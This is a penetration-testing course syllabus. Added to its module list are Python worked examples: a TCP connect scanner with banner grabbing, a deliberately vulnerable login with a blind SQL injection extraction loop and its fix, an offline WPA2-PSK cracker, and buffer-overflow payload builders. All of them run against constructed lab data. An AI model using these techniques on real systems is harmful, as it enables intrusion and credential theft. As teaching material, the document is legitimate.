
Real World Penetration Testing
RWPT Online Syllabus
v1.0

The Real World Penetration Testing course is an investment in your own career. Give yourself a competitive advantage over your colleagues. Our course is the most up-to-date in the industry!

Prerequisites
Real World Penetration Testing is an entry-level course, but it still requires students to
have certain knowledge before attending the class. A solid understanding of TCP/IP and
networking, plus reasonable Linux skills, are required. The course also demands practice,
testing, and a genuine willingness to learn, so that what you gain will grow your career in the
information security field.

Who Should Attend

- Penetration testers
- Ethical hackers
- Auditors who need to build deeper technical skills
- Security personnel whose job involves assessing target networks and systems to find security vulnerabilities
- Security managers
- System administrators
- Network administrators

Training Areas

- Web Application Security
- Source Code Audit
- Security Awareness
- Application Security Testing
- Security Management
- Security Policy Implementation
- SDLC Development
- Threat Modeling

Table of Contents

Introduction

Module 1:

Information Intelligence

1.1 Information Intelligence

1.1.1 Organize your information during penetration testing

1.1.2 Google/Bing Hacking

1.1.3 Extracting metadata of public documents

1.1.4 Gathering e-mail accounts, user names, subdomains and hostnames

1.1.5 whois lookups, OS info, uptime info, web server info

1.1.6 Traceroute to the target IP address


Module 2:

Scanning and Enumerating

2.1 Scanning

2.1.1 TCP Port Scanning

2.1.2 TCP SYN Port Scanning

2.1.3 TCP ACK Firewall Scanning

2.1.4 TCP "XMas" Port Scanning

2.1.5 Finding live hosts

2.1.6 UDP sweeping and probing

2.1.7 SSL Scanning

2.2 Database Enumerating

2.2.1 MySQL server version enumeration

2.2.2 MSSQL server version enumeration

2.2.3 Postgres server version enumeration

2.2.4 ORACLE server version enumeration

2.3 DNS Enumerating

2.4 SNMP Enumerating

2.5 SMTP Enumerating

2.6 SSH, POP3 and telnet version enumeration

2.7 Microsoft NetBIOS Enumerating
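
Worked example for 2.1.1 (TCP connect port scanning) and 2.6 (SSH, POP3 and telnet version enumeration). This is an illustration added to the syllabus, not course material from RWPT. A full connect() scan completes the three-way handshake, so an open port is one where connect succeeds, a closed port answers with a RST (connection refused), and a port that never answers is reported as filtered. Services such as sshd, POP3 and telnet send their greeting first, so reading the first bytes after connecting yields the version string. The local listener, its OpenSSH banner and the port choices are constructed for the demo so it runs offline.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Constructed banner for the throwaway local listener; it stands in for a real
# sshd/POP3/telnet daemon, which greets the client before reading anything.
DEMO_BANNER = b"SSH-2.0-OpenSSH_8.9p1 Debian-3\r\n"


def start_banner_server(banner=DEMO_BANNER, host="127.0.0.1"):
    """Start a throwaway listener that greets every client with `banner`.

    Returns (port, stop): stop() shuts the listener down. This simulates the
    target service so the scanner can be exercised without a lab network.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))            # port 0: the OS picks a free port
    srv.listen(16)
    srv.settimeout(0.2)            # lets the accept loop notice stop()
    stopping = threading.Event()

    def serve():
        while not stopping.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], stopping.set


def free_port(host="127.0.0.1"):
    """Return a port number that is (almost certainly) closed right now."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


def probe(host, port, timeout=1.0):
    """Full connect() probe: handshake, then read whatever greeting the
    service volunteers. Returns (port, state, banner)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except ConnectionRefusedError:
        return port, "closed", b""        # RST came back: nothing listening
    except (socket.timeout, OSError):
        return port, "filtered", b""      # no answer: dropped on the way
    banner = b""
    try:
        banner = s.recv(256)              # SSH/POP3/telnet speak first
    except (socket.timeout, OSError):
        pass
    finally:
        s.close()
    return port, "open", banner.strip()


def connect_scan(host, ports, timeout=1.0, workers=32):
    """Scan `ports` on `host` concurrently; returns {port: (state, banner)}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return {port: (state, banner) for port, state, banner in results}


if __name__ == "__main__":
    port, stop = start_banner_server()
    try:
        targets = [port, free_port()]
        for p, (state, banner) in sorted(connect_scan("127.0.0.1", targets).items()):
            print(f"{p:5d}/tcp {state:8s} {banner.decode(errors='replace')}")
    finally:
        stop()
```

A connect() scan is noisy (every open port gets a full session that the application logs); the SYN, ACK and XMas variants in 2.1.2 to 2.1.4 need raw sockets and are not shown here.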


Module 3:

Advanced Fingerprinting

3.1 Advanced Fingerprinting

3.1.1 Advanced web server fingerprinting

3.1.2 Advanced MSSQL servers fingerprinting

3.1.3 Advanced Web Application fingerprinting

3.1.4 Advanced Web Application Firewall fingerprinting

3.1.5 Advanced DNS and HTTP Load Balancers fingerprinting

3.1.6 Advanced Intrusion Prevention System fingerprinting

3.1.7 Advanced OS fingerprinting

Module 4:

Vulnerability Assessment

4.1 Vulnerability Assessment

4.1.1 Vulnerability Assessment vs Penetration testing

4.2 Assessing vulnerabilities

4.2.1 Nessus

4.2.2 W3af
Module 5:

Advanced Web Application Attacks

5.1 Advanced Cross Site Scripting attacks

5.1.1 From reflected XSS to reverse shell

5.1.2 From stored XSS to reverse shell

5.2 Advanced File handling attacks

5.2.1 from File Upload to reverse shell

5.2.2 from Remote File Inclusion to reverse shell

5.2.3 from Local File Inclusion to reverse shell

5.3 Advanced SQL Injection attacks

5.3.1 from SQL injection to reverse shell

5.3.2 from Blind SQL injection to reverse shell
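
Worked example for 5.3.1 and 5.3.2, added to this syllabus for illustration (it is not RWPT course material and does not go as far as the reverse shell the module titles promise). It shows the deliberately vulnerable string-built login query next to its parameterized fix, and a boolean-based blind extraction loop that recovers a column value one character at a time using nothing but the application's yes/no login result. The SQLite in-memory database, the users table and the secret value are constructed for the demo.

```python
import sqlite3
import string

# Constructed demo data: one privileged user whose secret we will extract.
SECRET = "s3cr3t!"


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))
    db.execute("INSERT INTO users VALUES ('guest', 'guest')")
    return db


def login_vulnerable(db, username, password):
    """Deliberately vulnerable (the 'before'): user input is glued into SQL.
    Only a true/false result reaches the caller, i.e. a blind oracle."""
    sql = f"SELECT 1 FROM users WHERE username='{username}' AND password='{password}'"
    return db.execute(sql).fetchone() is not None


def login_fixed(db, username, password):
    """Hardened: bound parameters, so input can never change the query shape."""
    sql = "SELECT 1 FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None


def blind_extract(oracle, column, table, where, max_len=32):
    """Boolean-based blind SQL injection: recover `column` of the row selected
    by `where`, one character per position, by asking the oracle a yes/no
    question for every candidate character. `oracle(payload)` submits the
    payload in the username field and returns the application's boolean."""
    alphabet = string.ascii_letters + string.digits + string.punctuation + " "
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            safe = ch.replace("'", "''")          # keep the probe itself valid SQL
            cond = f"(SELECT substr({column},{pos},1) FROM {table} WHERE {where})='{safe}'"
            # admin' closes the literal, AND <cond> asks the question,
            # -- comments out the application's own password check.
            if oracle(f"admin' AND {cond} -- "):
                out += ch
                break
        else:
            return out          # no candidate matched: end of the value
    return out


if __name__ == "__main__":
    db = build_db()
    oracle = lambda payload: login_vulnerable(db, payload, "x")
    print("recovered via blind SQLi:", blind_extract(oracle, "password", "users", "username='admin'"))
    print("vulnerable login bypassed:", login_vulnerable(db, "admin' OR 1=1 -- ", "x"))
    print("fixed login bypassed:", login_fixed(db, "admin' OR 1=1 -- ", "x"))
```

The extraction loop issues up to one request per candidate character per position; against a real target the same oracle is usually driven with a binary search on unicode() of the character, or with a time-based condition when the response carries no visible difference at all.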

5.4 Advanced Brute Force attacks

5.5 Advanced Cross-Site Request Forgery (CSRF) attacks

5.6 Advanced System Command injection attacks


Module 6:

Advanced Network Attacks

6.1 Sniffing Network Passwords

6.1.1 Sniffing HTTP passwords

6.1.2 Sniffing ftp and telnet passwords

6.1.3 Sniffing MySQL and VNC passwords

6.2 Advanced sniffing

6.2.1 Advanced SSL sniffing

6.2.2 Sniffing Facebook Cookies

6.2.3 Sniffing IM (Yahoo, MSN) chat

6.3 Advanced network Attacks

6.3.1 Attacking Windows Domain Controller and Own the Network

6.3.2 from Man in the Middle Attack to Full Network Compromise


Module 7:

Wireless Attacking Techniques

7.1 Discovery

7.1.1 Windows Discovery

7.1.2 Linux Discovery

7.1.3 Mobile Discovery

7.2 Attacking 802.11 Wireless Networks

7.2.1 De-authenticating Users

7.2.2 Defeating Mac Filtering

7.2.3 Cracking WEP on Linux with a Client Attached

7.2.4 Cracking WEP on Linux without a Client Attached

7.2.5 Denial of Service Attack

7.3 Attacking WPA-Protected 802.11 Networks

7.3.1 Breaking Authentication: WPA-PSK

7.3.2 Obtaining the Four-Way Handshake

7.3.3 Cracking the Pre-Shared Key

7.3.4 Decrypting WPA-PSK Captures
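
Worked example for 7.3.2 to 7.3.4, added to this syllabus for illustration (not RWPT course material). Cracking WPA-PSK offline means: derive the PMK from a candidate passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations, 32 bytes), expand PMK, both MAC addresses and both nonces into the PTK with the 802.11i PRF-512, take the first 16 bytes as the KCK, and check whether HMAC-SHA1 over the captured EAPOL-Key message 2 (MIC field zeroed) reproduces the MIC that was sniffed. The SSID, MAC addresses, nonces, passphrase and wordlist below are constructed; the capture is simulated by building message 2 with the real key-descriptor layout (WPA2, key descriptor version 2) rather than read from a pcap.

```python
import hashlib
import hmac

# Constructed lab values (not from any real network).
SSID = "CorpWifi"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "Summer2023!", "Summer2024!", "letmein"]

# EAPOL-Key field offsets: EAPOL hdr(4) + descriptor type(1) + key info(2)
# + key length(2) + replay counter(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
NONCE_OFFSET = 17
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b""
    for i in range(4):
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return ptk[:64]


def eapol_mic(kck, frame_with_zeroed_mic):
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def build_msg2(snonce, key_data=b""):
    """EAPOL-Key message 2 (STA -> AP) with the MIC field zeroed.
    Key info 0x010a = version 2, pairwise, MIC present; replay counter 1."""
    body = (b"\x02"                              # descriptor type: RSN
            + b"\x01\x0a"                        # key information
            + b"\x00\x10"                        # key length
            + (1).to_bytes(8, "big")             # replay counter
            + snonce                             # key nonce (SNonce)
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, ID
            + b"\x00" * 16                       # MIC placeholder
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, Key


def capture_handshake(passphrase, ssid, ap_mac, sta_mac, anonce, snonce):
    """Simulate what the sniffer sees: message 2 carrying a valid MIC."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    frame = bytearray(build_msg2(snonce))
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(ptk[:16], bytes(frame))
    return bytes(frame)


def crack_psk(ssid, ap_mac, sta_mac, anonce, msg2, wordlist):
    """Offline dictionary attack: for each candidate, passphrase -> PMK -> PTK
    -> KCK -> MIC, compared against the MIC captured in message 2."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]     # SNonce is inside msg2
    target_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = bytearray(msg2)
    zeroed[MIC_OFFSET:MIC_OFFSET + 16] = b"\x00" * 16
    zeroed = bytes(zeroed)
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), target_mic):
            return candidate
    return None


if __name__ == "__main__":
    msg2 = capture_handshake("Summer2024!", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
    print("cracked PSK:", crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, msg2, WORDLIST))
```

The cost is dominated by the 4096-iteration PBKDF2 per candidate, which is why the PMK is precomputed per SSID in rainbow-table style attacks and why a long, random passphrase defeats this entirely. Once the PMK is known, the same PTK gives the temporal key needed for 7.3.4 (decrypting the captured data frames).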


Module 8:

Windows Exploit Development

8.1 Introduction

8.1.1 Memory Corruption

8.1.2 Memory Corruption Classes

8.1.3 Vulnerability Analysis

8.1.4 Exploit Development

8.1.5 Debugger (Olly), Stack and Assembly all in one

8.2 Fuzzing

8.3 Exploiting Windows Buffer Overflows

8.3.1 Replicating the Crash

8.3.2 Controlling EIP

8.3.3 Locating Space for our Shellcode

8.3.4 Redirecting the execution flow

8.3.5 Finding a return address

8.3.6 Basic shellcode creation

8.3.7 from bind shell to reverse meterpreter shell
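
Worked example for the 8.3.2 to 8.3.6 sequence, added to this syllabus for illustration (it is not RWPT course material). Controlling EIP starts with a cyclic pattern whose every 4-byte window is unique: send it in place of the crashing input, read the EIP value from the debugger, and look up where those four bytes (little-endian) sit in the pattern. Bad characters are found by sending every byte value and diffing against what the debugger shows in memory. The final payload is padding up to the saved return address, the chosen return address in little-endian byte order, a NOP sled and the shellcode. The EIP value 0x37634136, the return address 0x625011af and the INT3 placeholder shellcode below are constructed for the demo, not from any real target.

```python
import string
from struct import pack


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...): unique 4-byte windows
    for the first 20280 bytes, which is enough for most stack overflows."""
    out = []
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out.append(a + b + c)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    return "".join(out)[:length].encode()


def pattern_offset(pattern, eip_value):
    """Given EIP as read in the debugger (e.g. 0x37634136), return the offset
    of the bytes that overwrote it. x86 is little-endian, so the register
    shows the four pattern bytes reversed; pack('<I') undoes that."""
    idx = pattern.find(pack("<I", eip_value))
    return idx if idx >= 0 else None


def badchar_probe(exclude=b"\x00"):
    """Byte string 0x01..0xff minus the characters already known to be bad;
    send this after the EIP overwrite and dump the stack in the debugger."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def find_bad_char(sent, dumped):
    """Diff what was sent against what the debugger shows in memory. The first
    mismatch (or the first byte missing if the copy was truncated) is the
    next bad character to add to the exclusion list."""
    for i, (s, d) in enumerate(zip(sent, dumped)):
        if s != d:
            return sent[i]
    if len(dumped) < len(sent):
        return sent[len(dumped)]
    return None


def build_payload(offset, ret_addr, shellcode, nop_sled=16, total=None):
    """Lay out the overflow string: padding, return address (little-endian,
    e.g. the address of a JMP ESP in a module without ASLR), NOP sled,
    shellcode, then optional filler to keep the input length constant."""
    buf = b"A" * offset + pack("<I", ret_addr) + b"\x90" * nop_sled + shellcode
    if total is not None and len(buf) < total:
        buf += b"C" * (total - len(buf))
    return buf


if __name__ == "__main__":
    pat = pattern_create(500)
    off = pattern_offset(pat, 0x37634136)          # value read from EIP in the debugger
    print("EIP offset:", off)
    sent = badchar_probe()
    dumped = sent[:9] + b"\x00" + sent[10:]         # constructed dump: 0x0a was mangled
    print("bad char: 0x%02x" % find_bad_char(sent, dumped))
    payload = build_payload(off, 0x625011af, b"\xcc" * 4, nop_sled=8)   # INT3 placeholder shellcode
    print("payload length:", len(payload), "return bytes:", payload[off:off + 4].hex())
```

Real shellcode for 8.3.6 and 8.3.7 would be generated with the bad characters excluded (the encoder needs the list this diff produces) and dropped in place of the INT3 bytes, which are only there so the debugger stops at the moment execution reaches the sled.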


Module 9:
Password Attacks

9.1 Online Password Attacks

9.1.1 FTP Bruteforce

9.1.2 POP3 Bruteforce

9.1.3 SNMP Bruteforce

9.1.4 VNC Bruteforce

9.1.5 MySQL Bruteforce

9.1.6 SMB Bruteforce

9.2 Password profiling

9.3 Offline Password Attacks

9.3.1 Hash Examples and how to crack MD5 hash

9.3.2 Cracking Linux/UNIX passwd and shadow files

9.3.3 Change/reset any account password from Windows 2000 to Windows 7

9.3.4 Retrieve Browser Passwords

9.3.5 Retrieve RDP passwords

9.3.6 Retrieve VNC passwords

9.3.7 Retrieve Instant Messaging passwords

9.3.8 Retrieve Facebook, Twitter, Gmail, Hotmail and Yahoo passwords

9.3.9 Retrieve Wireless profile passwords

9.3.10 Cracking Windows SAM Database in Seconds

9.3.11 Why cracking the Hash When you can pass the hash!
Module 10:

The Exploitation Show

10.1 Server side attacks

10.1.1 Attacking a Linux server

- Scanning

- Attack scenario 1: Remote Exploitation

- Attack scenario 2: Web Application Exploitation

- Attack scenario 3: Brute Force Login

- Post Exploitation

- Privilege Escalation

10.1.2 Attacking a Windows server

- Scanning

- Attack scenario 1: Remote Exploitation

- Attack scenario 2: Brute Force RDP

- Post Exploitation

- Privilege Escalation

10.2 Client side attacks

10.2.1 Attacking Windows 7 and bypassing DEP and ASLR

10.2.2 Attacking Ubuntu 10

10.2.3 Attacking Mac OS X 10.6.2 Snow Leopard

10.3 Attacking SCADA Systems


Module 11:

Denial of Service Attacks

11.1 Attacking Apache web server

11.2 Attacking IIS web server

11.3 Attacking a Windows Domain Controller


Module 12:

Advanced Bypassing and Evasion techniques

12.1 Advanced stateful packet inspection firewall Evasion and Bypassing

12.2 Advanced Antivirus Detection Evasion and Bypassing (100% FUD)

12.3 Advanced Intrusion Detection System (IDS) Evasion and Bypassing

12.4 Advanced Internal Network enumeration Against NIPS/HIPS

12.5 Advanced NO DHCP Evasion and Bypassing

12.6 Advanced DHCP MAC Address reservations Evasion and Bypassing

12.7 Advanced Firewall outbound/inbound rules and proxy Evasion and Bypassing

12.8 Advanced Windows User Access Control (UAC) Evasion and Bypassing
